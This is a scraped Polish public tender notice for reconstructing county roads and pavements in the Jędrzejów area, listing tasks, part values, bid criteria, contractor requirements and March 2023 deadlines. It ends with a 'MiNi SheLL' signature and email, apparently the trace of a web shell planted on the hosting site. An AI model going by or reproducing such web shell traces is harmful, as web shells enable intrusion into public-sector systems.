Brynica Mokra od km 0+840 do km 1+285<br/>Zakres robót: roboty przygotowawcze i zimne, podbudowa, elementy ulicy, roboty wykończeniowe<br/><br/>Zadanie 23: Przebudowa drogi powiatowej nr 1139T Jaronowice-Skroniów-Dalechowy na odc. Rakoszyn-Nowa Wieś od km 4+525 do km 4+725<br/>Zakres robót: roboty przygotowawcze, przełomy powstałe po wysadzinach korzeni drzew, nawierzchnia<br/><br/>OKSA<br/>Zadanie 24: Przebudowa drogi powiatowej nr 1176T Rogienice-Lipno-Mniszek polegające na wykonaniu chodnika w m. Stare Kanice od km 14+980 do km 15+280<br/>Zakres robót: roboty przygotowawcze i zimne, podbudowa, elementy ulicy, roboty wykończeniowe<br/><br/>Zadanie 25: Przebudowa drogi powiatowej nr 1176T Rogienice-Lipno-Mniszek polegająca na wykonaniu chodnika w m. Rembiechowa od km 14+060 do km 14+237<br/>Zakres robót: roboty przygotowawcze i zimne, podbudowa, elementy ulicy, roboty wykończeniowe<br/><br/>Zadanie 26: Przebudowa drogi powiatowej nr 1176T Rogienice-Lipno-Mniszek na odc. Lipno-Zalesie od km 6+780 do km 7+130<br/>Zakres robót: poszerzenie jezdni do 6,0 m (lokalizacja w km 6+780 do km 7+130 szer. 2 m) plus poszerzenie na łuku z drogą gminna dł. 20 m szer. 1 m; nawierzchnia i elementy ulicy; roboty wykończeniowe </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 4250340,77 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233140-2 - Roboty drogowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">18 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielenie zamówień podobnych, o których mowa w art. 214 ust.1 pkt 7 ustawy Pzp w okresie trzech lat od udzielenia zamówienia podstawowego dotychczasowemu wykonawcy, zamówienia polegającego na powtórzeniu podobnych robót budowlanych do 30% wartości zamówienia podstawowego. Skorzystanie z możliwości udzielenia tego zamówienia może nastąpić jeżeli pojawi się potrzeba wynikająca ze stanu dróg a zamawiający będzie dysponował środkami na realizację tego zamówienia</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z zapisami SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> SOBKÓW<br/>Zadanie 27: Przebudowa drogi powiatowej nr 1122T Brzegi-Sobków-Lipa w m. Sobków (ul. Stanisława Sobka) od km 5+575 do km 5+675<br/>Zakres robót: roboty przygotowawcze, przełomy, nawierzchnia, roboty wykończeniowe<br/><br/>Zadanie 28: Przebudowa drogi powiatowej nr 1122T Brzegi-Sobków-Lipa polegająca na wykonaniu chodnika w m. Sobków od km 6+630 do km 6+656 oraz od km 6+713 do km 6+903<br/>Zakres robót: roboty przygotowawcze i zimne, podbudowa, elementy ulicy, roboty wykończeniowe<br/><br/>Zadanie 29: Przebudowa drogi powiatowej nr 1119T Tyniec-Oksa-Mieronice-Miąsowa w m. Miąsowa od km 35+115 do km 35+290<br/>Zakres robót: roboty przygotowawcze i zimne, poszerzenie jezdni, podbudowa, elementy ulicy, roboty wykończeniowe<br/><br/>Zadanie 30: Przebudowa drogi powiatowej nr 1122T Brzegi-Sobków-Lipa na odc. Sokołów Górny – Sobków od km 3+530 do km 4+345<br/>Zakres robót: roboty przygotowawcze, przełomy na dł. 815 mb (obustronnie) szer. 1,0 m, nawierzchnia, roboty wykończeniowe<br/><br/>Zadanie 31: Przebudowa drogi powiatowej nr 1122T Brzegi-Sobków-Lipa polegająca na wykonaniu chodnika w m. Chomentów od km 12+625 do km 12+860<br/>Zakres robót: roboty przygotowawcze i zimne, podbudowa, elementy ulicy, roboty wykończeniowe<br/><br/>Jędrzejów<br/>Zadanie 32: Przebudowa drogi powiatowej nr 1125 Mnichów-Motkowice-Imielno w m. Mnichów od km 0+000 do km 0+320<br/>Zakres robót: chodnik w km 0+000 do km 0+320, poszerzenie do 5,5 m, roboty wykończeniowe<br/><br/>Zadanie 33: Przebudowa drogi powiatowej nr 1137T Diament-Mierzwin polegająca na wykonaniu chodnika w m. Łysaków Kawęczyński od km 4+805 do km 4+983<br/>Zakres: roboty przygotowawcze i zimne, podbudowa, elementy ulicy, roboty wykończeniowe<br/><br/>Zadanie 34: Przebudowa drogi powiatowej nr 1129T Ignacówka-Raków polegająca na wykonaniu chodnika w m. Ignacówka od km 0+000 do km 0+170<br/>Zakres: roboty przygotowawcze i zimne, podbudowa, elementy ulicy, roboty wykończeniowe<br/><br/>Zadanie 35: Przebudowa drogi powiatowej nr 1127T Jędrzejów-Sobków polegająca na wykonaniu chodnika w m. Kulczyzna od km 2+935 do km 3+180<br/>Zakres: roboty przygotowawcze i zimne, podbudowa, elementy ulicy, roboty wykończeniowe<br/><br/>Zadanie 36: Przebudowa drogi powiatowej nr 1116T Podchojny-Kulczyzna polegająca na wykonaniu chodnika w m. Podchojny od km 1+985 do km 2+200<br/>Zakres: roboty przygotowawcze i zimne, podbudowa, elementy ulicy, roboty wykończeniowe<br/><br/>Zadanie 37: Przebudowa drogi powiatowej nr 1137T Diament-Mierzwin na odc. Łysaków Pod Lasem – Łysaków Drugi od km 3+648 do km 3+798<br/>Zakres robót: chodnik w km 3+648 do km 3+798, poszerzenie, roboty wykończeniowe<br/><br/>IMIELNO<br/>Zadanie 38: Przebudowa drogi powiatowej nr 1130T Czarnocice-Borszowice na odc. Wólka-Borszowice od km 4+795 do km 5+295<br/>Zakres robót: roboty przygotowawcze, nawierzchnia, roboty wykończeniowe<br/><br/>Zadanie 39: Przebudowa drogi powiatowej nr 1137T Diament-Mierzwin polegająca na wykonaniu chodnika w m. Opatkowice Murowane od km 8+911 do km 9+121<br/>Zakres robót: roboty przygotowawcze i zimne, podbudowa, elementy ulicy, roboty wykończeniowe<br/><br/>Zadanie 40: Przebudowa drogi powiatowej nr 1138T Dalechowy -Helenówka na odc. Dalechowy -Karczunek od km 0+570 do km 1+070<br/>Zakres robót: roboty przygotowawcze, poszerzenie jezdni, nawierzchnia<br/><br/>Zadanie 41: Przebudowa drogi powiatowej nr 1135T Dalechowy -Sobowice polegająca na wykonaniu chodnika w m. Sobowice od km 10+070 do km 10+230<br/>Zakres robót: roboty przygotowawcze i zimne, podbudowa, elementy ulicy, roboty wykończeniowe </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 5553049,18 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233140-2 - Roboty drogowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">18 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielenie zamówień podobnych, o których mowa w art. 214 ust.1 pkt 7 ustawy Pzp w okresie trzech lat od udzielenia zamówienia podstawowego dotychczasowemu wykonawcy, zamówienia polegającego na powtórzeniu podobnych robót budowlanych do 30% wartości zamówienia podstawowego. Skorzystanie z możliwości udzielenia tego zamówienia może nastąpić jeżeli pojawi się potrzeba wynikająca ze stanu dróg a zamawiający będzie dysponował środkami na realizację tego zamówienia</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z zapisami SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ustawy Pzp, Zamawiający określa warunki udziału<br/>w postępowaniu dotyczące:1) Zdolności do występowania w obrocie<br/>gospodarczym Zamawiający nie formułuje warunku udziału w postępowaniu w tym zakresie 2) Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów Zamawiający nie formułuje warunku udziału w postępowaniu w tym<br/>zakresie 3) sytuacji ekonomicznej lub finansowej 4) Zamawiający nie formułuje warunku udziału w postępowaniu w tym zakresie 5)Zdolności technicznej lub zawodowej a) Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że wykonał w okresie ostatnich pięciu lat przed terminem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej dwie roboty budowlane polegające na wykonaniu nowego chodnika o wartości co najmniej 200 000,00 zł brutto każda (słownie: dwieście tysięcy złotych brutto). Wartości podane w<br/>dokumentach potwierdzających spełnienie warunku w walutach innych niż „złoty”/PLN Zamawiający przeliczy wg średniego kursu NBP na dzień ogłoszenia przetargu. Wartości podane w dokumentach potwierdzających spełniania warunku w walutach innych niż wskazane przez Zamawiającego Wykonawca przeliczy wg średniego kursu NBP na dzień wystawienia<br/>Świadectwa Przejęcia (dla Kontraktów realizowanych zgodnie z Warunkami FIDIC) lub na dzień podpisania Protokołu odbioru robót lub równoważnego dokumentu (w przypadku zamówień, w których nie wystawia się Świadectwa Przejęcia). Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych Wykonawców, którzy wykonują<br/>roboty budowlane, do realizacji których te zdolności są wymagane. Wykonawcy dołączają odpowiednio do oferty oświadczenie, z którego wynika, które roboty budowlane wykonują poszczególni Wykonawcy. b) Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje osobami, które skieruje do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacji o podstawie do dysponowania tymi osobami, tj. - dysponuje min. 1 osobą, posiadającą uprawnienia Kierownika Budowy w specjalności drogowej, który<br/>skierowany zostanie przez Wykonawcę do realizacji zamówienia publicznego Warunek ten podlega sumowaniu, co oznacza, że w przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia (np. konsorcja, spółki cywilne), w/w warunek mogą spełnić łącznie <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Pzp, zamawiający wezwie wykonawcę,<br/>którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania następujących podmiotowych środków dowodowych aktualnych na dzień złożenia:1)<br/>wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem<br/>dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest wstanie uzyskać tych dokumentów – inne odpowiednie dokumenty-załącznik nr 5 do SWZ; 2) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Kosztorys ofertowy – zał. Nr 2 do SWZ; Oświadczenie podmiotu udostępniającego zasoby składane na podstawie art. 125 ust. 5 – Zał. Nr 3a do SWZ (jeśli dotyczy); Oświadczenie składane na podstawie art. 117 ust. 4 – Zał. Nr 4 do SWZ (jeśli dotyczy); Zobowiązanie podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji<br/>zamówienia – w przypadku, gdy Wykonawca polega na zdolnościach innych podmiotów – Zał. Nr 7 do SWZ; Oryginał pełnomocnictwa do reprezentowania Wykonawcy w postępowaniu o zamówienie publiczne lub do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego, o ile prawo do reprezentowania Wykonawcy w powyższym zakresie<br/>nie wynika wprost z dokumentu rejestracyjnego; W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia, do oferty należy dołączyć dokument ustanawiający pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego;<br/>Potwierdzenie wpłaty wadium <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca jest zobowiązany do wniesienia wadium:<br/><br/> Część 1 zamówienia:<br/> Przebudowa dróg powiatowych Powiatu Jędrzejowskiego. Gmina Sędziszów, Wodzisław, Słupia<br/> w wysokości:<br/><br/> 5 000,00 PLN (słownie: pięć tysięcy 00/100 złotych)<br/><br/> Część 2 zamówienia:<br/> Przebudowa dróg powiatowych Powiatu Jędrzejowskiego. Gmina Małogoszcz, Nagłowice, Oksa<br/> w wysokości:<br/><br/> 5 000,00 PLN (słownie: pięć tysięcy 00/100 złotych)<br/><br/> Część 3 zamówienia:<br/> Przebudowa dróg powiatowych Powiatu Jędrzejowskiego. Gmina Sobków, Jędrzejów, Imielno<br/> w wysokości:<br/><br/> 5 000,00 PLN (słownie: pięć tysięcy 00/100 złotych) <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1)	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <br/>2)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia: a)	oświadczenia o których mowa w rozdziale IX pkt. 1 SWZ składa z ofertą każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawco w wykazuje spełnianie warunków udziału w postępowaniu. <br/>b)	w przypadku, o którym mowa w rozdziale IX pkt. 2 ppkt. 4 SWZ Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, kto re roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy. W przypadku gdy ofertę składa spółka cywilna, a pełen zakres prac wykonają wspólnicy wspólnie w ramach umowy spółki oświadczenie powinno potwierdzać ten fakt. <br/>c)	zobowiązani są oni na wezwanie Zamawiającego, złożyć podmiotowe środki dowodowe, o których mowa w rozdziale X pkt. 4 SWZ, przy czym podmiotowe środki dowodowe składa odpowiednio ykonawca/Wykonawcy, który/którzy wykazuje/-ą spełnienie warunku. 3)	Jeżeli została wybrana oferta Wykonawco w wspólnie ubiegających się o udzielenie <br/>zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj oraz zakres zmian umowy został opisany w paragrafie 12 wzoru umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-03-27 07:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zdpjedrzejow.ezamawiajacy.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-03-27 08:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-04-25</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamówienie realizowane jest w ramach Rządowego Funduszu POLSKI ŁAD: Program Inwestycji Strategicznych

Creat By MiNi SheLL
Email: jattceo@gmail.com